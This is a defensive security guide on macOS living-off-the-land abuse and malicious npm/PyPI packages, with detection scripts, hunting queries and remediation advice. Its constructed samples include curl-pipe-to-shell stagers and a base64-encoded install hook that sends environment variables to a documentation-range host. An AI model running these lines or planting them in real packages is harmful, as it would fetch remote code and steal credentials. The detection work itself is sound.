
macOS LotL Abuse & Supply Chain Compromise: ThreatsDay Defense Guide

Security Arsenal Team
April 25, 2026
6 min read

The ThreatsDay Bulletin this week paints a stark picture of the modern threat landscape: a $290M DeFi heist, rampant abuse of macOS Living-off-the-Land (LotL) binaries, and the disruption of ProxySmart SIM farms. However, the most alarming takeaway for defenders is the persistence of "same bugs, same mistakes." Attackers continue to find success not by innovating new exploitation techniques, but by abusing trust—specifically within the software supply chain and legitimate system tools.

Defenders can no longer treat every binary included with an OS as benign, nor can they assume that third-party packages in their CI/CD pipelines are safe. We are seeing active supply chain compromises where unchecked packages steal data and establish unauthorized access mechanisms. This intelligence requires immediate action to hunt for LotL abuse and audit software dependencies.

Technical Analysis

1. macOS Living-off-the-Land (LotL) Abuse

Attackers are increasingly leveraging trusted, pre-installed macOS binaries to bypass application allow-listing and evade detection. Rather than dropping custom malware, adversaries use tools such as osascript (the command-line runner for Open Scripting Architecture scripts), curl, and bash to fetch and execute payloads under the cover of Apple-signed binaries.

  • Affected Platform: macOS (Ventura, Sonoma, Sequoia).
  • Attack Vector: LotL Binaries (specifically OSA scripts).
  • Mechanism: Adversaries use osascript to execute AppleScript or JavaScript for Automation (JXA) to download second-stage payloads or interact with the system (e.g., accessing the Keychain).
  • Exploitation Status: Confirmed active exploitation in the wild. Not a vulnerability in the traditional sense (CVE), but an abuse of functionality.
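The mechanism above reduces to a handful of observable features on the process-creation event: an osascript image, a URL or download command in its arguments, a `do shell script` or JXA fetch, and a parent that is not a terminal. The following triage routine is an added example written for this guide, not code from the bulletin; the event layout (image, parent_image, command_line), the sample events and the 203.0.113.0/24 addresses (documentation space) are all constructed.

```python
"""Added example: triage osascript process events for Living-off-the-Land abuse.

Illustrative code written for this guide, not tooling from the bulletin. The event
layout (image, parent_image, command_line) and every sample event are constructed;
the 203.0.113.0/24 addresses are documentation space.
"""
import re
from typing import Dict, List, Optional

# Any URL on the command line: a script that is told where to fetch from
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)

# Fragments that mean the script shells out, downloads, or touches the Keychain.
# Matched case-insensitively against the command line.
SUSPICIOUS_FRAGMENTS = (
    "do shell script",                 # AppleScript shelling out
    "curl",                            # download inside the script
    "$.nsurl",                         # JXA: NSURL-based fetch
    "nsdata.datawithcontentsofurl",    # JXA: NSData fetch
    "security find-generic-password",  # Keychain read via the security(1) tool
)

# Parents that normally launch osascript interactively; anything else (a
# browser, an Office app, a downloaded installer) is worth a look.
EXPECTED_PARENTS = ("/bash", "/zsh", "/sh", "/Terminal", "/iTerm2")


def analyse_event(event: Dict[str, str]) -> List[Dict[str, Optional[str]]]:
    """Return one finding per indicator for an osascript process-creation event.

    Non-osascript events return an empty list so the function can run over a whole feed.
    """
    if not event.get("image", "").endswith("/osascript"):
        return []
    cmd = event.get("command_line", "")
    lowered = cmd.lower()
    url_match = URL_RE.search(cmd)
    url = url_match.group(0) if url_match else None
    findings: List[Dict[str, Optional[str]]] = []

    def add(reason: str) -> None:
        findings.append({"reason": reason, "url": url, "command_line": cmd})

    if url:
        add("command line contains a URL")
    for fragment in SUSPICIOUS_FRAGMENTS:
        if fragment in lowered:
            add(f"command line contains '{fragment}'")
    parent = event.get("parent_image", "")
    if parent and not parent.endswith(EXPECTED_PARENTS):
        add(f"spawned by non-shell parent {parent}")
    return findings


def scan(events: List[Dict[str, str]]) -> List[Dict[str, Optional[str]]]:
    """Run analyse_event over a list of events and flatten the findings."""
    return [finding for event in events for finding in analyse_event(event)]


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    {   # benign: an admin querying Finder from a terminal
        "image": "/usr/bin/osascript",
        "parent_image": "/bin/zsh",
        "command_line": "osascript -e 'tell application \"Finder\" to get name of every window'",
    },
    {   # stager: AppleScript shelling out to curl, launched from a browser
        "image": "/usr/bin/osascript",
        "parent_image": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
        "command_line": "osascript -e 'do shell script \"curl -s https://203.0.113.10/stage2 | bash\"'",
    },
    {   # stager: JXA fetching a second stage with NSData
        "image": "/usr/bin/osascript",
        "parent_image": "/bin/bash",
        "command_line": ("osascript -l JavaScript -e 'ObjC.import(\"Foundation\"); "
                         "$.NSData.dataWithContentsOfURL($.NSURL.URLWithString(\"https://203.0.113.10/p.js\"))'"),
    },
    {   # not osascript at all: ignored by this rule
        "image": "/usr/bin/curl",
        "parent_image": "/bin/bash",
        "command_line": "curl https://example.org/",
    },
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding['reason']:<55} url={finding['url']}")
```

The benign Finder query produces no findings, the browser-launched `do shell script` stager produces four (URL, shell-out, curl, non-shell parent), and the JXA fetch produces three. Feed it EDR process events mapped to the three fields and tune EXPECTED_PARENTS to the MDM and automation agents in your fleet, which are the main source of false positives.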

2. Supply Chain Compromise via Malicious Packages

The bulletin highlights that "packages you did not check are stealing data." This refers to the ongoing trend of typosquatting and dependency confusion attacks in package repositories (npm, PyPI, RubyGems).

  • Affected Products: Software utilizing public package managers.
  • Attack Vector: Malicious packages containing obfuscated code (e.g., base64 encoded strings) that execute upon installation.
  • Mechanism: post-install scripts or obfuscated code within the package that exfiltrates environment variables (API keys, AWS credentials) to attacker-controlled C2 servers.
  • Exploitation Status: Active; observed both in automated registry scanning and in manual IR engagements.
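Because the damage is done by install-time lifecycle hooks, the cheapest control is to read those hooks before `npm install` runs them. The scanner below is an added example written for this guide, not tooling from the bulletin; the manifests are constructed, and the indicator list is an assumption drawn from the behaviour described above (hooks that decode base64, fetch remote code, eval it, or read environment variables). It also decodes long base64 runs so an exfiltrator hidden inside one is matched too.

```python
"""Added example: static triage of npm lifecycle hooks in package.json manifests.

Illustrative code for this guide, not tooling from the bulletin. The manifests below
are constructed, and the indicator list is an assumption drawn from the behaviour the
text describes: install-time hooks that decode base64, fetch remote code, eval it, or
read environment variables.
"""
import base64
import binascii
import json
import re
from typing import Dict, List

# npm runs these hooks automatically on `npm install`; "test" or "build" do not run unattended
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "preuninstall", "postuninstall")

INDICATORS = [
    ("remote fetch", re.compile(r"\b(curl|wget)\b|https?://", re.I)),
    ("base64 decode", re.compile(r"base64\s+(-d|--decode)|Buffer\.from\([^)]*['\"]base64['\"]|\batob\(", re.I)),
    ("eval of string", re.compile(r"\beval\(|new Function\(|\bchild_process\b", re.I)),
    ("environment harvest", re.compile(r"process\.env\b|\$\{?[A-Z_]*(KEY|TOKEN|SECRET|PASSWORD)", re.I)),
    ("pipe to shell", re.compile(r"\|\s*(ba|z)?sh\b")),
]

# Runs of base64 text long enough to hide a payload rather than a version string
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_blobs(text: str) -> List[str]:
    """Decode long base64 runs so indicators hidden inside them are also matched."""
    decoded = []
    for blob in B64_BLOB.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue
    return decoded


def triage_manifest(manifest: Dict) -> Dict[str, List[str]]:
    """Map each lifecycle hook that matches an indicator to the sorted indicator names."""
    hits: Dict[str, List[str]] = {}
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        script = scripts.get(hook)
        if not script:
            continue
        texts = [script] + decode_blobs(script)
        names = sorted({name for name, rx in INDICATORS for text in texts if rx.search(text)})
        if names:
            hits[hook] = names
    return hits


# Constructed samples. The "payload" is a one-line exfiltrator of the kind the text
# describes, base64-encoded the way real droppers hide it; 203.0.113.10 is documentation space.
PAYLOAD_JS = ("require('https').request('https://203.0.113.10/c', {method: 'POST'})"
              ".end(JSON.stringify(process.env))")
PAYLOAD_B64 = base64.b64encode(PAYLOAD_JS.encode()).decode()

SAMPLE_MANIFESTS = {
    "benign-native": json.dumps({"name": "native-thing", "version": "1.0.0",
                                 "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"}}),
    "obfuscated-postinstall": json.dumps({"name": "colorz", "version": "1.0.1",
                                          "scripts": {"postinstall":
                                              f"node -e \"eval(Buffer.from('{PAYLOAD_B64}','base64').toString())\""}}),
    "curl-preinstall": json.dumps({"name": "lodahs", "version": "4.17.22",
                                   "scripts": {"preinstall": "curl -s https://203.0.113.10/i.sh | sh"}}),
}


def triage_all(manifests: Dict[str, str]) -> Dict[str, Dict[str, List[str]]]:
    """Parse each JSON manifest and keep only those with findings."""
    results = {}
    for name, raw in manifests.items():
        hits = triage_manifest(json.loads(raw))
        if hits:
            results[name] = hits
    return results


if __name__ == "__main__":
    for name, hits in triage_all(SAMPLE_MANIFESTS).items():
        for hook, names in hits.items():
            print(f"{name}: {hook} -> {', '.join(names)}")
```

Run it over `node_modules/*/package.json` after a dry-run install, or wire it into CI before `npm ci`. Static matching is a triage aid, not proof: heavily packed payloads will slip through, which is why the lockfile and egress controls in the Remediation section still matter.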

3. ProxySmart SIM Farms

While primarily a telephony fraud vector, the disruption of SIM farms indicates a shift in how attackers scale operations. These farms are often used to bypass 2FA (SMS-based) or mass-send phishing messages. In an enterprise context, this correlates with an increase in SMS-based phishing (smishing) targeting employees.

  • Affected Infrastructure: Telephony providers, MSPs.
  • Risk: Bypassing MFA, widespread credential harvesting.

Detection & Response

The following detection rules focus on the macOS LotL abuse and the Supply Chain compromises, as these present the highest risk for direct system compromise and data exfiltration.

SIGMA Rules

---
title: macOS LotL - Suspicious osascript Network Connection
id: 8c5d4a2e-1b3c-4d6e-9f8a-1b2c3d4e5f6a
status: experimental
description: Detects osascript making outbound network connections, a common LotL technique to download payloads or exfiltrate data.
references:
  - https://attack.mitre.org/techniques/T1059/002/
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.execution
  - attack.t1059.002
logsource:
  category: network_connection
  product: macos
detection:
  selection:
    Image|endswith: '/osascript'
  condition: selection
falsepositives:
  - Legitimate developer automation scripts
level: high
---
title: Supply Chain - Package Manager Spawning Shell
id: 9d6e5f3b-2c4d-5e7f-0a1b-2c3d4e5f6a7b
status: experimental
description: Detects package managers (npm, pip, cargo, gem) spawning shell processes, which is how install-time lifecycle scripts run. npm and pip are normally launched through their interpreter, so node/python parents are matched on their command line. Use product macos for the same rule on Mac endpoints.
references:
  - https://attack.mitre.org/techniques/T1195/002/
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.initial_access
  - attack.t1195.002
logsource:
  category: process_creation
  product: linux
detection:
  selection_parent_image:
    ParentImage|endswith:
      - '/npm'
      - '/npx'
      - '/yarn'
      - '/pnpm'
      - '/pip'
      - '/pip3'
      - '/cargo'
      - '/gem'
  selection_parent_interpreter:
    ParentImage|endswith:
      - '/node'
      - '/python'
      - '/python3'
    ParentCommandLine|contains:
      - 'npm'
      - 'pip'
  selection_shell:
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/zsh'
  condition: 1 of selection_parent_* and selection_shell
falsepositives:
  - Legitimate build scripts with known behavior. Every npm lifecycle script runs through sh -c, so baseline expected packages and escalate on the shell's children (curl, base64, python) rather than on the shell alone.
level: medium

KQL (Microsoft Sentinel / Defender)

// Hunt for suspicious macOS LotL behavior: osascript told where to fetch from or shelling out.
// osascript only ships on macOS, so no platform filter is needed (OSPlatform lives in DeviceInfo, not here).
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "osascript"
| where ProcessCommandLine has_any ("http://", "https://", "curl", "do shell script")
| extend URL = extract(@"(https?://[^\s]+)", 1, ProcessCommandLine)
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, ProcessCommandLine, URL
| order by Timestamp desc

Velociraptor VQL

-- Hunt for running osascript processes whose command line fetches a URL, invokes curl, or shells out
SELECT Pid, Ppid, Name, Exe, CommandLine, Username
FROM pslist()
WHERE Name = 'osascript'
  AND (CommandLine =~ 'https?://' OR CommandLine =~ 'curl' OR CommandLine =~ 'do shell script')

-- Hunt for npm package manifests written in the last 24 hours under user home directories
-- (a newly installed or modified dependency). Deleted files cannot be found by globbing;
-- use package-manager logs or file-system journaling for those. Recursive globs are
-- expensive, so scope the paths to developer machines and build hosts.
SELECT OSPath, Size, Mtime, Mode
FROM glob(globs=['/Users/*/**/node_modules/*/package.json', '/home/*/**/node_modules/*/package.json'])
WHERE Mtime > timestamp(epoch=now() - 86400)
ORDER BY Mtime DESC
LIMIT 200

Remediation Script (Bash)

#!/bin/bash
# Remediation/Hardening: Audit for suspicious package installs and osascript activity
# Usage: sudo ./audit_supply_chain.sh
set -u

# User home directories live under /Users on macOS and /home on Linux
if [[ "$(uname)" == "Darwin" ]]; then
  HOME_ROOTS=(/Users /var/root)
else
  HOME_ROOTS=(/home /root)
fi

echo "[+] Auditing for recent npm/pip installations under: ${HOME_ROOTS[*]}"

# node_modules directories whose contents changed in the last 24 hours
echo "[+] Checking for 'npm install' activity in the last 24 hours..."
find "${HOME_ROOTS[@]}" -name node_modules -type d -mtime -1 2>/dev/null

# site-packages directories (pip) whose contents changed in the last 24 hours
echo "[+] Checking for recent pip activity..."
find "${HOME_ROOTS[@]}" -name site-packages -type d -mtime -1 2>/dev/null

# macOS only: unified log entries emitted by osascript in the last hour
if [[ "$(uname)" == "Darwin" ]]; then
  echo "[+] macOS detected. Checking the unified log for osascript activity..."
  log show --predicate 'process == "osascript"' --last 1h --style compact 2>/dev/null | head -20
fi

echo "[+] Audit complete. Review findings manually."

Remediation

  1. Implement Software Bill of Materials (SBOM): You cannot protect what you cannot see. Generate SBOMs for all critical applications to identify unauthorized or transitive dependencies.
  2. Lock Down Package Managers: Enforce strict dependency pinning (package-lock.json for npm, requirements.txt with --hash entries for pip) and review lockfile changes in Pull Requests. Avoid wildcard, caret, or tilde ranges in dependencies.
  3. Restrict LotL Binaries on macOS: Use MDM solutions (e.g., Jamf, Intune) to deploy Privacy Preferences Policy Control (PPPC) profiles that deny osascript, bash, and curl (identified by code requirement) access to TCC-protected locations such as ~/Documents and ~/Downloads. PPPC governs TCC permissions only; restricting these binaries' network access requires a host firewall or a Network Extension content filter.
  4. Network Segmentation: Restrict build systems and CI/CD runners from accessing the public internet directly unless necessary. Force all traffic through an explicit proxy with SSL inspection to detect data exfiltration attempts.
  5. Developer Hygiene: Mandate Hardware Security Keys (FIDO2) for developers so that account takeover cannot be achieved by intercepting SMS codes, whether through SIM swapping or SIM-farm-driven smishing.
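Steps 1 and 2 are only as good as the check that enforces them in CI. The policy checker below is an added example written for this guide, not tooling from the bulletin. Its manifests are constructed and the hash values are placeholders, not real digests. The policy it enforces is one reading of the advice above: npm dependencies declared with exact versions and present in package-lock.json with an sha512 integrity hash resolved over HTTPS, and pip requirements pinned with == and carrying --hash so pip's hash-checking mode refuses substituted artifacts.

```python
"""Added example: verify that a project's dependencies are pinned and integrity-checked.

Illustrative code for this guide, not tooling from the bulletin. The manifests and
hashes below are constructed (the hash values are placeholders, not real digests).
The policy is one reading of the remediation advice: exact npm versions locked with an
sha512 integrity hash over HTTPS, and pip requirements pinned with == plus --hash.
"""
import re
from typing import Dict, List, Tuple

# Exact semver with optional pre-release/build metadata; anything else (^, ~, *, >=, "latest") is a range
EXACT_NPM = re.compile(r"^\d+\.\d+\.\d+(?:[-+][0-9A-Za-z.-]+)?$")
# name==version followed by any options (e.g. --hash=...)
PIP_LINE = re.compile(r"^\s*([A-Za-z0-9_.-]+)\s*==\s*([^\s;]+)(.*)$")

Problem = Tuple[str, str]


def check_npm(package_json: Dict, lock: Dict) -> List[Problem]:
    """Return (package, problem) for every dependency that is not pinned or not integrity-locked."""
    problems: List[Problem] = []
    deps: Dict[str, str] = {}
    for section in ("dependencies", "devDependencies"):
        deps.update(package_json.get(section, {}))
    packages = lock.get("packages", {})  # lockfileVersion 2/3 layout: keys are node_modules/<name>
    for name, spec in sorted(deps.items()):
        if not EXACT_NPM.match(spec):
            problems.append((name, f"range specifier '{spec}' instead of an exact version"))
        entry = packages.get(f"node_modules/{name}")
        if entry is None:
            problems.append((name, "missing from package-lock.json"))
            continue
        if not str(entry.get("integrity", "")).startswith("sha512-"):
            problems.append((name, "lockfile entry has no sha512 integrity hash"))
        if not str(entry.get("resolved", "")).startswith("https://"):
            problems.append((name, "lockfile entry not resolved over HTTPS"))
    return problems


def check_pip(requirements_txt: str) -> List[Problem]:
    """Return (requirement, problem) for every line that is not an exact pin with a --hash option."""
    problems: List[Problem] = []
    joined = requirements_txt.replace("\\\n", " ")  # fold backslash continuations onto one line
    for raw in joined.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):  # blank, comment, or a pip option such as --index-url
            continue
        match = PIP_LINE.match(line)
        if not match:
            problems.append((line, "not pinned with =="))
            continue
        name, _version, rest = match.groups()
        if "--hash=sha256:" not in rest:
            problems.append((name, "no --hash=sha256 for pip's hash-checking mode"))
    return problems


# Constructed sample project: one good pin, two ranges, one weak hash, one stale lockfile.
PACKAGE_JSON = {
    "dependencies": {"express": "4.19.2", "lodash": "^4.17.21", "left-pad": "*"},
    "devDependencies": {"jest": "29.7.0"},
}
PACKAGE_LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "node_modules/express": {"version": "4.19.2",
                                 "resolved": "https://registry.npmjs.org/express/-/express-4.19.2.tgz",
                                 "integrity": "sha512-PLACEHOLDER"},
        "node_modules/lodash": {"version": "4.17.21",
                                "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
                                "integrity": "sha1-PLACEHOLDER"},  # weak hash left over from an old lockfile
        "node_modules/jest": {"version": "29.7.0",
                              "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz",
                              "integrity": "sha512-PLACEHOLDER"},
        # left-pad deliberately absent: package.json and the lockfile have drifted
    },
}
REQUIREMENTS_TXT = "\n".join([
    "# constructed sample requirements file",
    "requests==2.32.3 \\",
    "    --hash=sha256:" + "00" * 32,
    "flask>=3.0",
    "pyyaml==6.0.2",
])

if __name__ == "__main__":
    for pkg, problem in check_npm(PACKAGE_JSON, PACKAGE_LOCK) + check_pip(REQUIREMENTS_TXT):
        print(f"{pkg}: {problem}")
```

Fail the pipeline when either list is non-empty, and run it on the same commit that `npm ci` and `pip install --require-hashes` will consume, so a lockfile edited in a Pull Request cannot be merged without the review step 2 calls for.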
